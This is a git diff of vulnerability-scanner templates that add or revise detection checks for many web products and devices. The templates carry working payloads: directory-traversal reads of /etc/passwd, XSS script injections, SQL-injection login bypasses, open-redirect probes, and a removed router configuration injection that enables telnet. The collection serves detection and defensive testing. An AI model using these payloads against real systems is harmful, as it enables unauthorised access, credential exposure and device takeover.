+      - '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://interact.sh'
+      - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
+      - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
 
     stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: regex
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
         part: header
 
       - type: status
diff --git a/vulnerabilities/other/blue-ocean-excellence-lfi.yaml b/vulnerabilities/other/blue-ocean-excellence-lfi.yaml
index d2f7caa672..e16f0ecf1e 100644
--- a/vulnerabilities/other/blue-ocean-excellence-lfi.yaml
+++ b/vulnerabilities/other/blue-ocean-excellence-lfi.yaml
@@ -1,11 +1,16 @@
 id: blue-ocean-excellence-lfi
 
 info:
-  name: Blue Ocean Excellence LFI
+  name: Blue Ocean Excellence - Local File Inclusion
   author: pikpikcu
   severity: high
+  description: Blue Ocean Excellence is vulnerable to local file inclusion.
   reference:
     - https://blog.csdn.net/qq_41901122/article/details/116786883
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: blue-ocean,lfi
 
 requests:
@@ -23,3 +28,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/22
diff --git a/vulnerabilities/other/buffalo-config-injection.yaml b/vulnerabilities/other/buffalo-config-injection.yaml
deleted file mode 100644
index ba678d6928..0000000000
--- a/vulnerabilities/other/buffalo-config-injection.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: buffalo-config-injection
-
-info:
-  name: Buffalo WSR-2533DHPL2 - Configuration File Injection
-  author: gy741
-  severity: critical
-  description: |
-    The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.
-  reference:
-    - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild
-    - https://www.tenable.com/security/research/tra-2021-13
-    - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
-  tags: buffalo,firmware,iot
-
-requests:
-  - raw:
-      - |
-        POST /images/..%2fapply_abstract.cgi HTTP/1.1
-        Host: {{Hostname}}
-        Connection: close
-
-        action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0A
-        ARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: header
-        words:
-          - "/Success.htm"
-
-      - type: status
-        status:
-          - 302
\ No newline at end of file
diff --git a/vulnerabilities/other/bullwark-momentum-lfi.yaml b/vulnerabilities/other/bullwark-momentum-lfi.yaml
index 55d671db0b..b870a1d767 100644
--- a/vulnerabilities/other/bullwark-momentum-lfi.yaml
+++ b/vulnerabilities/other/bullwark-momentum-lfi.yaml
@@ -1,18 +1,22 @@
 id: bullwark-momentum-lfi
 
 info:
-  name: Bullwark Momentum Series JAWS 1.0 - Directory Traversal
+  name: Bullwark Momentum Series JAWS 1.0 - Local File Inclusion
   author: pikpikcu
   severity: high
+  description: Bullwark Momentum Series JAWS 1.0 is vulnerable to local file inclusion.
   reference:
     - https://www.exploit-db.com/exploits/47773
-    - http://www.bullwark.net/ # vendor homepage
     - http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 # software link
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   metadata:
     version: Bullwark Momentum Series Web Server JAWS/1.0
-    shodan-query: https://www.shodan.io/search?query=Bullwark&page=1
-    fofa-query: https://fofa.so/result?q=Bullwark&qbase64=QnVsbHdhcms%3D
-  tags: bullwark,lfi
+    shodan-query: Bullwark
+    fofa-query: "Bullwark"
+  tags: lfi,edb,bullwark
 
 requests:
   - raw:
@@ -31,3 +35,5 @@ requests:
       - type: regex
         regex:
           - "root:.*:0:0:"
+
+# Enhanced by mp on 2022/07/22
diff --git a/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml b/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml
new file mode 100644
index 0000000000..f7b252cac6
--- /dev/null
+++ b/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml
@@ -0,0 +1,27 @@
+id: carel-bacnet-gateway-traversal
+
+info:
+  name: Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Local File Inclusion
+  author: gy741
+  severity: high
+  description: Carel pCOWeb HVAC BACnet Gateway 2.1.0 is vulnerable to local file inclusion because of input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.
+  reference:
+    - https://www.zeroscience.mk/codes/carelpco_dir.txt
+    - https://thecyberpost.com/tools/exploits-cve/carel-pcoweb-hvac-bacnet-gateway-2-1-0-unauthenticated-directory-traversal/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: carel,lfi,traversal,unauth,bacnet
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd"
+
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+
+# Enhanced by mp on 2022/07/22
diff --git a/vulnerabilities/other/carrental-xss.yaml b/vulnerabilities/other/carrental-xss.yaml
new file mode 100644
index 0000000000..c9625edd14
--- /dev/null
+++ b/vulnerabilities/other/carrental-xss.yaml
@@ -0,0 +1,66 @@
+id: carrental-xss
+
+info:
+  name: Car Rental Management System v1.0 - Stored Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    Car Rental Management System v1.0 is vulnerable to Cross Site Scripting via admin/ajax.php?action=save_category in Name and Description Parameter.
+  reference:
+    - https://www.exploit-db.com/exploits/49546
+    - https://www.sourcecodester.com/
+  metadata:
+    verified: true
+    shodan-query: http.html:"Car Rental Management System"
+  tags: xss,cms,authenticated,edb
+
+requests:
+  - raw:
+      - |
+        POST /admin/ajax.php?action=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /admin/ajax.php?action=save_category HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCMJ5bh3B6m9767Em
+
+        ------WebKitFormBoundaryCMJ5bh3B6m9767Em
+        Content-Disposition: form-data; name="id"
+
+
+        ------WebKitFormBoundaryCMJ5bh3B6m9767Em
+        Content-Disposition: form-data; name="name"
+
+        </script><script>alert(document.domain)</script>
+        ------WebKitFormBoundaryCMJ5bh3B6m9767Em
+        Content-Disposition: form-data; name="description"
+
+        <script>alert(document.domain)</script>
+        ------WebKitFormBoundaryCMJ5bh3B6m9767Em--
+
+      - |
+        GET /admin/index.php?page=categories HTTP/1.1
+        Host: {{Hostname}}
+
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<p>Name: <b></script><script>alert(document.domain)</script></b>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/other/caucho-resin-info-disclosure.yaml b/vulnerabilities/other/caucho-resin-info-disclosure.yaml
index 11dea3cf9b..dc7fea1829 100644
--- a/vulnerabilities/other/caucho-resin-info-disclosure.yaml
+++ b/vulnerabilities/other/caucho-resin-info-disclosure.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/exploits/27888
-  tags: exposure,resin,caucho
+  tags: exposure,resin,caucho,edb
 
 requests:
   - method: GET
diff --git a/vulnerabilities/other/ckan-dom-based-xss.yaml b/vulnerabilities/other/ckan-dom-based-xss.yaml
index 7cc02f4bf3..75408652e9 100644
--- a/vulnerabilities/other/ckan-dom-based-xss.yaml
+++ b/vulnerabilities/other/ckan-dom-based-xss.yaml
@@ -1,7 +1,7 @@
 id: ckan-dom-based-xss
 
 info:
-  name: CKAN DOM Based XSS
+  name: CKAN DOM Based Cross-Site Scripting
   author: dhiyaneshDk
   severity: medium
   description: CKAN uses the old jQuery Sparkle library which is vulnerable to DOM Based XSS.
diff --git a/vulnerabilities/other/clockwatch-enterprise-rce.yaml b/vulnerabilities/other/clockwatch-enterprise-rce.yaml
index 20c5c15802..cba3b3ef94 100644
--- a/vulnerabilities/other/clockwatch-enterprise-rce.yaml
+++ b/vulnerabilities/other/clockwatch-enterprise-rce.yaml
@@ -1,11 +1,17 @@
 id: clockwatch-enterprise-rce
 
 info:
-  name: ClockWatch Enterprise RCE
+  name: ClockWatch Enterprise - Remote Code Execution
   author: gy741
   severity: critical
+  description: |
+    ClockWatch Enterprise is susceptible to remote code execution.
   reference:
     - https://blog.grimm-co.com/2021/07/old-dog-same-tricks.html
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: clockwatch,rce,network
 
 network:
@@ -27,3 +33,5 @@ network:
       - type: word
         words:
           - "OK-C"
+
+# Enhanced by mp on 2022/05/27
diff --git a/vulnerabilities/other/coldfusion-debug-xss.yaml b/vulnerabilities/other/coldfusion-debug-xss.yaml
index 4de60288e2..0aa70de503 100644
--- a/vulnerabilities/other/coldfusion-debug-xss.yaml
+++ b/vulnerabilities/other/coldfusion-debug-xss.yaml
@@ -1,7 +1,7 @@
 id: coldfusion-debug-xss
 
 info:
-  name: Adobe ColdFusion Debug Page XSS
+  name: Adobe ColdFusion Debug Page Cross-Site Scripting
   author: dhiyaneshDK
   severity: medium
   description: The remote Adobe ColdFusion debug page has been left open to unauthenticated users, this could allow remote attackers to trigger a reflected cross site scripting against the visitors of the site.
diff --git a/vulnerabilities/other/commax-biometric-auth-bypass.yaml b/vulnerabilities/other/commax-biometric-auth-bypass.yaml
index dd820dfb22..a83ef1582e 100644
--- a/vulnerabilities/other/commax-biometric-auth-bypass.yaml
+++ b/vulnerabilities/other/commax-biometric-auth-bypass.yaml
@@ -4,11 +4,12 @@ info:
   name: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass
   author: gy741
   severity: critical
-  description: The COMMAX Biometric Access Control System suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings.
+  description: |
+    COMMAX Biometric Access Control System 1.0.0 suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings.
   reference:
     - https://www.exploit-db.com/exploits/50206
     - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php
-  tags: commax,auth-bypass
+  tags: commax,auth-bypass,edb
 
 requests:
   - raw:
@@ -21,11 +22,9 @@ requests:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
 
       - type: word
+        part: body
         words:
           - "<title>::: COMMAX :::</title>"
 
@@ -33,3 +32,8 @@ requests:
         part: header
         words:
           - "text/html"
+
+      - type: status
+        status:
+          - 200
+# Enhanced by mp on 2022/05/27
diff --git a/vulnerabilities/other/commax-credentials-disclosure.yaml b/vulnerabilities/other/commax-credentials-disclosure.yaml
index 3c33beb354..c155fb68ba 100644
--- a/vulnerabilities/other/commax-credentials-disclosure.yaml
+++ b/vulnerabilities/other/commax-credentials-disclosure.yaml
@@ -4,7 +4,8 @@ info:
   name: COMMAX Smart Home Ruvie CCTV Bridge DVR - RTSP Credentials Disclosure
   author: gy741
   severity: critical
-  description: The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose RTSP credentials in plain-text
+  description: |
+    The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose real time streaming protocol (RTSP) credentials in plain-text.
   reference:
     - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php
   tags: commax,exposure,camera,iot
@@ -16,6 +17,7 @@ requests:
 
     matchers:
       - type: word
+        part: body
         words:
           - "DVR Lists"
           - "rtsp://"
@@ -28,3 +30,5 @@ requests:
         part: body
         regex:
           - 'rtsp:\/\/([a-z:0-9A-Z@$.]+)\/Streaming\/Chann'
+
+# Enhanced by mp on 2022/05/27
diff --git a/vulnerabilities/other/comtrend-password-exposure.yaml b/vulnerabilities/other/comtrend-password-exposure.yaml
index da04291a2e..85ea879e96 100644
--- a/vulnerabilities/other/comtrend-password-exposure.yaml
+++ b/vulnerabilities/other/comtrend-password-exposure.yaml
@@ -7,7 +7,7 @@ info:
   description: A vulnerability in COMTREND ADSL Router allows remote authenticated users to execute arbitrary commands via the telnet interface, the password for this interface is leaked to unauthenticated users via the 'password.cgi' endpoint.
   reference:
     - https://www.exploit-db.com/exploits/16275
-  tags: router,exposure,iot,rce
+  tags: router,exposure,iot,rce,edb
 
 requests:
   - method: GET
diff --git a/vulnerabilities/other/core-chuangtian-cloud-rce.yaml b/vulnerabilities/other/core-chuangtian-cloud-rce.yaml
index cab900eaf7..baf19d8ef4 100644
--- a/vulnerabilities/other/core-chuangtian-cloud-rce.yaml
+++ b/vulnerabilities/other/core-chuangtian-cloud-rce.yaml
@@ -1,12 +1,17 @@
 id: core-chuangtian-cloud-rce
 
 info:
-  name: Core Chuangtian Cloud Desktop System RCE
+  name: Core Chuangtian Cloud Desktop System - Remote Code Execution
   author: pikpikcu
   severity: critical
+  description: Core Chuangtian Cloud Desktop System is susceptible to remote code execution vulnerabilities.
   reference:
     - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
-  tags: rce
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  tags: rce,fileupload,intrusive
 
 requests:
   - raw:
@@ -36,3 +41,5 @@ requests:
           - 'contains(body_2, "PHP Version")'
           - 'status_code_2 == 200'
         condition: and
+
+# Enhanced by mp on 2022/06/01
diff --git a/vulnerabilities/other/crystal-live-server-lfi.yaml b/vulnerabilities/other/crystal-live-server-lfi.yaml
new file mode 100644
index 0000000000..8e56585214
--- /dev/null
+++ b/vulnerabilities/other/crystal-live-server-lfi.yaml
@@ -0,0 +1,22 @@
+id: crystal-live-server-lfi
+
+info:
+  name: Crystal Live HTTP Server 6.01 - Directory Traversal
+  author: 0x_Akoko
+  severity: high
+  reference: https://cxsecurity.com/issue/WLB-2019110127
+  tags: lfi,crystal
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and
diff --git a/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml b/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml
index 1f0775c517..a5a31a0e5f 100644
--- a/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml
+++ b/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml
@@ -1,12 +1,16 @@
 id: cs-cart-unauthenticated-lfi
 
 info:
-  name: CS-Cart unauthenticated LFI
+  name: CS-Cart - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: A vulnerability in CS-Cart allows remote unauthenticated attackers to access locally stored files and reveal their content.
+  description: CS-Cart is vulnerable to local file inclusion because it allows remote unauthenticated attackers to access locally stored files and reveal their content.
   reference:
     - https://cxsecurity.com/issue/WLB-2020100100
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: cscart,lfi
 
 requests:
@@ -24,3 +28,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/22
diff --git a/vulnerabilities/other/cvms-sqli.yaml b/vulnerabilities/other/cvms-sqli.yaml
new file mode 100644
index 0000000000..01f4dfb269
--- /dev/null
+++ b/vulnerabilities/other/cvms-sqli.yaml
@@ -0,0 +1,38 @@
+id: cvms-sqli
+
+info:
+  name: Company Visitor Management System (CVMS) 1.0 - SQLi Authentication Bypass
+  author: arafatansari
+  severity: high
+  description: |
+    Company Visitor Management System Login page can be bypassed with a simple SQLi to the username parameter.
+  reference:
+    - https://www.exploit-db.com/exploits/48884
+  metadata:
+    verified: true
+  tags: cvms,sqli,auth-bypass,cms,edb
+
+requests:
+  - raw:
+      - |
+        POST /index.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username=admin%27+or+%271%27%3D%271%27%23&password=nuclei&login=
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Admin user'
+          - 'Dashboard'
+          - 'CVMS'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/other/devalcms-xss.yaml b/vulnerabilities/other/devalcms-xss.yaml
new file mode 100644
index 0000000000..ed7a954353
--- /dev/null
+++ b/vulnerabilities/other/devalcms-xss.yaml
@@ -0,0 +1,34 @@
+id: devalcms-xss
+
+info:
+  name: Devalcms 1.4A - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    Devalcms 1.4A is affected by Cross-Site Scripting (rXSS) in the 'currentpath' parameter of the index.php file.
+  reference:
+    - https://www.exploit-db.com/exploits/6369
+  metadata:
+    verified: true
+  tags: devalcms,xss,cms,edb
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'sub menu for: <script>alert(document.domain)</script>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 500
diff --git a/vulnerabilities/other/dicoogle-pacs-lfi.yaml b/vulnerabilities/other/dicoogle-pacs-lfi.yaml
index 84da5d8927..b31e82cb5f 100644
--- a/vulnerabilities/other/dicoogle-pacs-lfi.yaml
+++ b/vulnerabilities/other/dicoogle-pacs-lfi.yaml
@@ -1,14 +1,19 @@
 id: dicoogle-pacs-lfi
 
 info:
-  name: Dicoogle PACS 2.5.0 - Directory Traversal
+  name: Dicoogle PACS 2.5.0 - Local File Inclusion
   author: 0x_akoko
   severity: high
-  description: In version 2.5.0, it is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials aren't required.
+  description: Dicoogle PACS 2.5.0 is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials aren't required.
   reference:
+    - https://www.exploit-db.com/exploits/45007
     - https://cxsecurity.com/issue/WLB-2018070131
     - http://www.dicoogle.com/home
-  tags: windows,lfi,dicoogle
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: edb,windows,lfi,dicoogle
 
 requests:
   - method: GET
@@ -23,3 +28,5 @@ requests:
           - "fonts"
           - "extensions"
         condition: and
+
+# Enhanced by mp on 2022/07/22
diff --git a/vulnerabilities/other/digitalrebar-traversal.yaml b/vulnerabilities/other/digitalrebar-traversal.yaml
new file mode 100644
index 0000000000..f0e57c7006
--- /dev/null
+++ b/vulnerabilities/other/digitalrebar-traversal.yaml
@@ -0,0 +1,39 @@
+id: digitalrebar-traversal
+
+info:
+  name: Digital Rebar - Local File Inclusion
+  author: c-sh0
+  severity: high
+  description: Digital Rebar versions 4.3.0, 4.3.2, 4.3.3, 4.4.0, and maybe others are vulnerable to local file inclusion because web requests can navigate outside of DRP controlled areas.
+  reference:
+    - https://docs.rackn.io/en/latest/doc/security/cve_20200924A.html
+    - https://docs.rackn.io/en/latest/doc/release.html
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: lfi,rackn,digitalrebar
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0"
+
+      - type: word
+        part: header
+        words:
+          - 'X-Drp-Sha256sum:'
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/22
diff --git a/vulnerabilities/other/discourse-xss.yaml b/vulnerabilities/other/discourse-xss.yaml
index 1ba1c7ef63..27bf55e7c8 100644
--- a/vulnerabilities/other/discourse-xss.yaml
+++ b/vulnerabilities/other/discourse-xss.yaml
@@ -1,7 +1,7 @@
 id: discourse-xss
 
 info:
-  name: Discourse CMS - XSS
+  name: Discourse CMS - Cross-Site Scripting
   author: madrobot
   severity: medium
   description: Cross-site scripting (XSS) on Discourse CMS
@@ -10,7 +10,7 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(xss)%3E'
+      - '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(/xss/)%3E'
     matchers-condition: and
     matchers:
       - type: status
@@ -19,10 +19,10 @@ requests:
 
       - type: word
         words:
-          - "<svg/onload=alert(xss)>"
+          - "<svg/onload=alert(/xss/)>"
         part: body
 
       - type: word
         words:
           - "text/html"
-        part: header
\ No newline at end of file
+        part: header
diff --git a/vulnerabilities/other/dixell-xweb500-filewrite.yaml b/vulnerabilities/other/dixell-xweb500-filewrite.yaml
index 5cfb5554ca..445c9333ac 100644
--- a/vulnerabilities/other/dixell-xweb500-filewrite.yaml
+++ b/vulnerabilities/other/dixell-xweb500-filewrite.yaml
@@ -1,14 +1,16 @@
 id: dixell-xweb500-filewrite
 
 info:
-  name: Dixell XWEB-500 - Arbitrary File Write
+  name: Emerson Dixell XWEB-500 - Arbitrary File Write
   author: hackerarpan
   severity: critical
+  description: Emerson Dixell XWEB-500 products are affected by arbitrary file write vulnerabilities in /cgi-bin/logo_extra_upload.cgi, /cgi-bin/cal_save.cgi, and /cgi-bin/lo_utils.cgi. An attacker will be able to write any file on the target system without any kind of authentication mechanism, and this can lead to denial of service and potentially remote code execution. Note that this product has not been supported since 2018 and should be removed or replaced.
   reference:
     - https://www.exploit-db.com/exploits/50639
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-45420
   metadata:
-    google-dork: inurl:"xweb500.cgi"
-  tags: lfw,iot,dixell,xweb500
+    google-query: inurl:"xweb500.cgi"
+  tags: lfw,iot,dixell,xweb500,edb,fileupload,intrusive
 
 requests:
   - raw:
@@ -34,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/01
diff --git a/vulnerabilities/other/dotnetcms-sqli.yaml b/vulnerabilities/other/dotnetcms-sqli.yaml
new file mode 100644
index 0000000000..32a2bed114
--- /dev/null
+++ b/vulnerabilities/other/dotnetcms-sqli.yaml
@@ -0,0 +1,29 @@
+id: dotnetcms-sqli
+
+info:
+  name: DotnetCMS SQLi
+  author: ritikchaddha
+  severity: high
+  metadata:
+    verified: true
+    shodan-query: http.html:"dotnetcms"
+  reference:
+    - https://www.cnblogs.com/rebeyond/p/4951418.html
+    - http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0150742
+  tags: dotnetcms,dotnet,sqli
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/user/City_ajax.aspx?CityId=33'union%20select%20sys.fn_sqlvarbasetostr(HashBytes('MD5','{{randstr}}')),2--"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5("{{randstr}}")}}'
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/other/dss-download-fileread.yaml b/vulnerabilities/other/dss-download-fileread.yaml
index 732b472466..f8533dd8e1 100644
--- a/vulnerabilities/other/dss-download-fileread.yaml
+++ b/vulnerabilities/other/dss-download-fileread.yaml
@@ -1,9 +1,14 @@
 id: dss-download-fileread
 
 info:
-  name: DSS Download File Read
+  name: DSS Download - Local File Inclusion
   author: ritikchaddha
   severity: high
+  description: DSS Download is vulnerable to local file inclusion.
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: lfi,dss,lfr
 
 requests:
@@ -22,3 +27,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/22
diff --git a/vulnerabilities/other/duomicms-sql-injection.yaml b/vulnerabilities/other/duomicms-sql-injection.yaml
index 4b5cbee41c..037f7558a3 100644
--- a/vulnerabilities/other/duomicms-sql-injection.yaml
+++ b/vulnerabilities/other/duomicms-sql-injection.yaml
@@ -6,21 +6,24 @@ info:
   severity: high
   reference:
     - https://redn3ck.github.io/2016/11/01/duomiCMS/
+  metadata:
+    verified: true
+    shodan-query: title:"DuomiCMS"
   tags: duomicms,sqli
 
+variables:
+  num: "999999999"
+
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))"
+      - "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5({{num}})))"
 
     matchers-condition: and
     matchers:
-
       - type: word
         words:
-          - "e0ec043b3f9e198ec09041687e4d4e8d"
-        part: body
-        condition: and
+          - '{{md5({{num}})}}'
 
       - type: status
         status:
diff --git a/vulnerabilities/other/dzzoffice-xss.yaml b/vulnerabilities/other/dzzoffice-xss.yaml
new file mode 100644
index 0000000000..6d494d58e7
--- /dev/null
+++ b/vulnerabilities/other/dzzoffice-xss.yaml
@@ -0,0 +1,38 @@
+id: dzzoffice-xss
+
+info:
+  name: Dzzoffice 2.02.1_SC_UTF8 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    A XSS vulnerability was discovered in dzzoffice 2.02.1_SC_UTF8, There is a Reflected XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the zero parameter.
+  reference:
+    - https://github.com/zyx0814/dzzoffice/issues/183
+  metadata:
+    verified: true
+    shodan-query: http.html:"dzzoffice"
+  tags: dzzoffice,xss
+
+requests:
+  - raw:
+      - |
+        POST /index.php?mod=system&op=orgtree&do=orgtree HTTP/1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        id=%23&nouser=0&moderator=0&zero=<img+src=x+onerror=alert(document.domain)>&stype=0&range=0&showjob=0
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"text":"<img src=x onerror=alert(document.domain)>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/other/ecshop-sqli.yaml b/vulnerabilities/other/ecshop-sqli.yaml
index d1769cf368..fbb70eb64c 100644
--- a/vulnerabilities/other/ecshop-sqli.yaml
+++ b/vulnerabilities/other/ecshop-sqli.yaml
@@ -1,13 +1,19 @@
 id: ecshop-sqli
 
 info:
-  name: Ecshop SQLi
-  author: Lark-lab,ImNightmaree
+  name: ECShop 2.x/3.x SQL Injection
+  author: Lark-lab,ImNightmaree,ritikchaddha
   severity: high
-  description: A vulnerability in Ecshop allows remote unauthenticated users to inject arbitrary SQL statements into via the 'Referer' header field.
+  description: |
+    The vulnerability affects ECShop 2.x and 3.x versions allows remote unauthenticated users to inject arbitrary SQL statements into via the 'Referer' header field,and later via SQL injection vulnerability to malicious code injected into the dangerous eval function in order to achieve arbitrary code execution.
   reference:
     - https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a
     - https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
+    - http://www.wins21.com/mobile/blog/blog_view.html?num=1172
+    - https://www.shutingrz.com/post/ad_hack-ec_exploit/
+  metadata:
+    verified: true
+    fofa-query: app="ECShop"
   tags: sqli,php,ecshop
 
 requests:
@@ -18,6 +24,14 @@ requests:
         Content-Type: application/x-www-form-urlencoded
